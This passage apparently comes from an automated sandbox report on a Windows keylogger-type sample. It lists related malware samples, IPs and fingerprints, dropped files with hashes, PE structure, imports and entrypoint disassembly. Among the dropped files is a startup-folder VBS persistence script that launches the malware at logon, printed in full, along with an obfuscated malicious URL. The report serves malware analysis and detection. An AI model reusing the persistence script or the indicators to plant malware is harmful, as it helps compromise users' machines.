	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.167.146
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX	Get hash	malicious	Unknown	Browse	104.17.205.31
	https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330	Get hash	malicious	Unknown	Browse	172.64.41.3
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	104.21.95.160
UTMEMUS	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1

Process:	C:\Users\user\Desktop\tNXl4XhgmV.exe
File Type:	data
Category:	modified
Size (bytes):	94720
Entropy (8bit):	6.763638130243384
Encrypted:	false
SSDEEP:	1536:Ey9JQTG5VjN/HYpv7Uat8fwHIgH17vbKP2grMmOaf19qq:Ey9mTG5vv1mHtgTrM701T
MD5:	379EA0608D6B9C741E27FAE956E5B929
SHA1:	33C05735538865D09D7C1404781BD92B56945135
SHA-256:	C3572713B0193DD910BBC4BDC4739C3C6A447F70474D60F56445E4E69F6E02A9
SHA-512:	633BECDCAF2458F7879CD94757C18D38DF423A8A8C5EE522707F5986DFBD355308A5E484C7B8F12CDF73E5E0BDB50E7D3B3A47797943891A25BAE3FBA1252A3E
Malicious:	false
Reputation:	low
Preview:	.i.QS3S8KVSO..MC.PQP3S8O.SO27MC3PQP3S8OVSO27MC3PQP3S8OVSO27M.3PQ^,.6O.Z...L..q.8Z .?$<(@V cP1?>\'.-3s=GYm]p..`sU 26a?:Gg3PQP3S8..SO~6NC..3S8OVSO2.MA2[P.3SPNVSG27MC3P..2S8oVSO.6MC3.QP.S8OTSO67MC3PQP5S8OVSO27.B3PSP3S8OVQOR.MC#PQ@3S8OFSO"7MC3PQ@3S8OVSO27MC3.PPxS8OV.N2.HC3PQP3S8OVSO27MC3PQ.2S4OVSO27MC3PQP3S8OVSO27MC3PQP3S8OVSO27MC3PQP3S8OVSO27Mc3PYP3S8OVSO27MK.PQ.3S8OVSO27MC.$4(GS8O.5N27mC3P9Q3S:OVSO27MC3PQP3S.OV3a@D? 3PQ.6S8O.RO21MC3:PP3S8OVSO27MC3.QPs}J:<,27AC3PQ.2S8MVSOB6MC3PQP3S8OVSOr7M.3PQP3S8OVSO27MC3`.Q3S8OV.O27OC6P.3S..VSL27M.3PW..S8.VSO27MC3PQP3S8OVSO27MC3PQP3S8OVSO27MC3PQP3S.2.\...$0..QP3S8OWQL61EK3PQP3S8O(SO2qMC3.QP3d8OVvO27 C3PuP3SFOVS127M'3PQ"3S8.VSOu7MC\PQP]S8O(SO2)Ok,PQZ.u8M~sO2=Mi.#pP3Y.NVSKA.MC9.SP3WKlVSE.4MC7#uP3Y.KVSKA.MC9.TP3W..VP.$1MC(?iP3Y8L.FI27Vi.PSx.S8EVyi24.V5PQK.q8M.ZO23g.@MQP5{zOVY;;7MA.ZQP7y&M~.O2=gaMCQP7x8et-[27Ih3zs.&S8K}Se.I[C3TzP.qFXVSK.7gE.2Q"._8?U<.27Kk.PQZ..8OPSe.73M3PUR\.8O\ue.7e.3PWP..8OPSe.73p3PU\|4-.OVWd$I\|C3T.VKS8I%.O2=h..PQT..8O\Se.7e.3PWP..8OP

C:\Users\user\AppData\Local\Temp\aut38CE.tmp

Download File

Process:	C:\Users\user\Desktop\tNXl4XhgmV.exe
File Type:	data
Category:	dropped
Size (bytes):	61840
Entropy (8bit):	7.910584793333783
Encrypted:	false
SSDEEP:	1536:4HzDgsotDFLt84bKnOvwNOQtP1/z/SN9XCUZyd2Q7f6YK371/q8:4fgsoVFL6nh9P1/z6Nl3CDKhi8
MD5:	8555C0D4DF6BE1532AC30C6EC50A6276
SHA1:	351974C3186E0D844C801419A72D5E4F486E47E1
SHA-256:	7A938286F0B00ADD18E271AC2392F7D84B3653013E573E630B2EA3F7DE6A83A9
SHA-512:	E727F65C6FF0B00D784D8726D1BCAAB64C9217007A9B5CDB51E07C225A256728DAF11D3F026328BEF2A95BA57D49034C00AD4A74692BEFFC179E178047014E8D
Malicious:	false
Preview:	EA06..r..Zx....8..t.o".C..5.......Szm.f..........+..L..`.x.d?.q..+R...I<.P...Bc?.W$.l..=..m....+..\.....?.Q...y...t...C..9:...u...n.......N....ZeS.[......<.Tj.0..S..%.5....3.T.)qQ..T....Q....j.>D.[..........=.._.@....T...H...c..+ .........oc.I.....@......xNj3:.../.S..;...?....i..i..S.S...uP.x..C.....O%.)....3.h..B..K\|.).6..i..:....6..S.sj.G?3..?5j.0.x....\|...8...............{.z.2m1....u(.-. .......... .<......,..%.p..D.ZK......\.<+......r.F....)..>e=....;.BgY......V.C........V..vSJm.o#.Z+;.-.A...5@..%..T62@..Q?.....f..I.M...B.x.T..Z...2.l..Z.F....).j.>e3..h..&r.z..3...A..5...MM.D.!.=..C../..-.[[.M.6...........!I...uK.B3q.V.!....E..2-.~q?..%.).....#q9.>.S..&.:l.U.W?s.}r...Yb`0.B7.....y...x.M%..}Z.d.Ro..F..K..)2_0.9h.....o..xT...4.yG...=.oM.......8..jt........ ..&oM...P.......).......... ...d.......n.Z]i....QP..7...ie.Q'.9.[.a...XEN..W.s:.N.N..).*...t../]...[-.U.t.......`....4.XPd..8.....8V..6...q...X........&gS........S.w.H.!...Y.J.-.....

C:\Users\user\AppData\Local\Temp\aut3C0A.tmp

Download File

Process:	C:\Users\user\AppData\Local\ghauts\vaccinatory.exe
File Type:	data
Category:	dropped
Size (bytes):	61840
Entropy (8bit):	7.910584793333783
Encrypted:	false
SSDEEP:	1536:4HzDgsotDFLt84bKnOvwNOQtP1/z/SN9XCUZyd2Q7f6YK371/q8:4fgsoVFL6nh9P1/z6Nl3CDKhi8
MD5:	8555C0D4DF6BE1532AC30C6EC50A6276
SHA1:	351974C3186E0D844C801419A72D5E4F486E47E1
SHA-256:	7A938286F0B00ADD18E271AC2392F7D84B3653013E573E630B2EA3F7DE6A83A9
SHA-512:	E727F65C6FF0B00D784D8726D1BCAAB64C9217007A9B5CDB51E07C225A256728DAF11D3F026328BEF2A95BA57D49034C00AD4A74692BEFFC179E178047014E8D
Malicious:	false
Preview:	EA06..r..Zx....8..t.o".C..5.......Szm.f..........+..L..`.x.d?.q..+R...I<.P...Bc?.W$.l..=..m....+..\.....?.Q...y...t...C..9:...u...n.......N....ZeS.[......<.Tj.0..S..%.5....3.T.)qQ..T....Q....j.>D.[..........=.._.@....T...H...c..+ .........oc.I.....@......xNj3:.../.S..;...?....i..i..S.S...uP.x..C.....O%.)....3.h..B..K\|.).6..i..:....6..S.sj.G?3..?5j.0.x....\|...8...............{.z.2m1....u(.-. .......... .<......,..%.p..D.ZK......\.<+......r.F....)..>e=....;.BgY......V.C........V..vSJm.o#.Z+;.-.A...5@..%..T62@..Q?.....f..I.M...B.x.T..Z...2.l..Z.F....).j.>e3..h..&r.z..3...A..5...MM.D.!.=..C../..-.[[.M.6...........!I...uK.B3q.V.!....E..2-.~q?..%.).....#q9.>.S..&.:l.U.W?s.}r...Yb`0.B7.....y...x.M%..}Z.d.Ro..F..K..)2_0.9h.....o..xT...4.yG...=.oM.......8..jt........ ..&oM...P.......).......... ...d.......n.Z]i....QP..7...ie.Q'.9.[.a...XEN..W.s:.N.N..).*...t../]...[-.U.t.......`....4.XPd..8.....8V..6...q...X........&gS........S.w.H.!...Y.J.-.....

C:\Users\user\AppData\Local\Temp\aut6C61.tmp

Download File

Process:	C:\Users\user\AppData\Local\ghauts\vaccinatory.exe
File Type:	data
Category:	dropped
Size (bytes):	61840
Entropy (8bit):	7.910584793333783
Encrypted:	false
SSDEEP:	1536:4HzDgsotDFLt84bKnOvwNOQtP1/z/SN9XCUZyd2Q7f6YK371/q8:4fgsoVFL6nh9P1/z6Nl3CDKhi8
MD5:	8555C0D4DF6BE1532AC30C6EC50A6276
SHA1:	351974C3186E0D844C801419A72D5E4F486E47E1
SHA-256:	7A938286F0B00ADD18E271AC2392F7D84B3653013E573E630B2EA3F7DE6A83A9
SHA-512:	E727F65C6FF0B00D784D8726D1BCAAB64C9217007A9B5CDB51E07C225A256728DAF11D3F026328BEF2A95BA57D49034C00AD4A74692BEFFC179E178047014E8D
Malicious:	false
Preview:	EA06..r..Zx....8..t.o".C..5.......Szm.f..........+..L..`.x.d?.q..+R...I<.P...Bc?.W$.l..=..m....+..\.....?.Q...y...t...C..9:...u...n.......N....ZeS.[......<.Tj.0..S..%.5....3.T.)qQ..T....Q....j.>D.[..........=.._.@....T...H...c..+ .........oc.I.....@......xNj3:.../.S..;...?....i..i..S.S...uP.x..C.....O%.)....3.h..B..K\|.).6..i..:....6..S.sj.G?3..?5j.0.x....\|...8...............{.z.2m1....u(.-. .......... .<......,..%.p..D.ZK......\.<+......r.F....)..>e=....;.BgY......V.C........V..vSJm.o#.Z+;.-.A...5@..%..T62@..Q?.....f..I.M...B.x.T..Z...2.l..Z.F....).j.>e3..h..&r.z..3...A..5...MM.D.!.=..C../..-.[[.M.6...........!I...uK.B3q.V.!....E..2-.~q?..%.).....#q9.>.S..&.:l.U.W?s.}r...Yb`0.B7.....y...x.M%..}Z.d.Ro..F..K..)2_0.9h.....o..xT...4.yG...=.oM.......8..jt........ ..&oM...P.......).......... ...d.......n.Z]i....QP..7...ie.Q'.9.[.a...XEN..W.s:.N.N..).*...t../]...[-.U.t.......`....4.XPd..8.....8V..6...q...X........&gS........S.w.H.!...Y.J.-.....

C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

Download File

Process:	C:\Users\user\Desktop\tNXl4XhgmV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	985600
Entropy (8bit):	6.884259483402454
Encrypted:	false
SSDEEP:	24576:Zu6J33O0c+JY5UZ+XC0kGso6Fa0iQtBZwEWY:bu0c++OCvkGs9Fa0DvZ2Y
MD5:	5A08CE9FCE5F6482D2A785E0117370BF
SHA1:	D4E3A46776EC83776083F34C9C7643F7C92CBFA0
SHA-256:	EB3C77CCBEDF21F84A138C9F85CA4A4153E9F8DCD14FE21E5BAD8207B72B2FBE
SHA-512:	A983D249ACAB7A5E05828998993C540CE928A5A79553D52956D627AE0A1500636369F7DF25CE49CF3B2261E6949076C84D27CA11E1C354D335BFFB29D0594576
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...;.Og.........."..........(.......}............@..................................d....@...@.......@.....................L...\|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Download File

Process:	C:\Users\user\AppData\Local\ghauts\vaccinatory.exe
File Type:	data
Category:	modified
Size (bytes):	284
Entropy (8bit):	3.451328818077223
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1Cl3EtZePzRK6nriIM8lfQVn:DsO+vNlMkXg1Q1O+GzR3mA2n
MD5:	0FA8BA3DBFAF1FEEED739EEA53D8C17C
SHA1:	6931FA4013E48E0DEB5166122B09ABA9647AB7C2
SHA-256:	A39C5C5A453B80B2292ADFF135A09A0A9BE6DBDEFED3A622D45228880902446C
SHA-512:	E660282C40AE672711D0281A777D049DACAE7E6BA65D2D5C0BC3874F46C99EE25285345D825EC9BD203811205C4F419330A24C702FABEFBCCB45D96200C47749
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.g.h.a.u.t.s.\.v.a.c.c.i.n.a.t.o.r.y...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.884259483402454
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tNXl4XhgmV.exe
File size:	985'600 bytes
MD5:	5a08ce9fce5f6482d2a785e0117370bf
SHA1:	d4e3a46776ec83776083f34c9c7643f7c92cbfa0
SHA256:	eb3c77ccbedf21f84a138c9f85ca4a4153e9f8dcd14fe21e5bad8207b72b2fbe
SHA512:	a983d249acab7a5e05828998993c540ce928a5a79553d52956d627ae0a1500636369f7df25ce49cf3b2261e6949076c84d27ca11e1c354d335bffb29d0594576
SSDEEP:	24576:Zu6J33O0c+JY5UZ+XC0kGso6Fa0iQtBZwEWY:bu0c++OCvkGs9Fa0DvZ2Y
TLSH:	6D25AE2273DDC360CB669173BF69B7016EBF7C610630B95B2F880D7DA960162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674FFC3B [Wed Dec 4 06:52:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F1948EFCC4Ah
jmp 00007F1948EEFA14h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1948EEFB9Ah
cmp edi, eax
jc 00007F1948EEFEFEh
bt dword ptr [004C31FCh], 01h
jnc 00007F1948EEFB99h
rep movsb
jmp 00007F1948EEFEACh
cmp ecx, 00000080h
jc 00007F1948EEFD64h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1948EEFBA0h
bt dword ptr [004BE324h], 01h
jc 00007F1948EF0070h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1948EEFD3Dh
test edi, 00000003h
jne 00007F1948EEFD4Eh
test esi, 00000003h
jne 00007F1948EEFD2Dh
bt edi, 02h
jnc 00007F1948EEFB9Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1948EEFBA3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1948EEFBF5h
bt esi, 03h
jnc 00007F1948EEFC48h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x2809c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x2809c	0x28200	d99fc209934002c95be71269fc533bb3	False	0.8348848812305296	data	7.648365764155606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1f361	data			1.0003598219663488
RT_GROUP_ICON	0xeeb1c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xeeb94	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xeeba8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xeebbc	0x14	data	English	Great Britain	1.25
RT_VERSION	0xeebd0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xeecac	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, 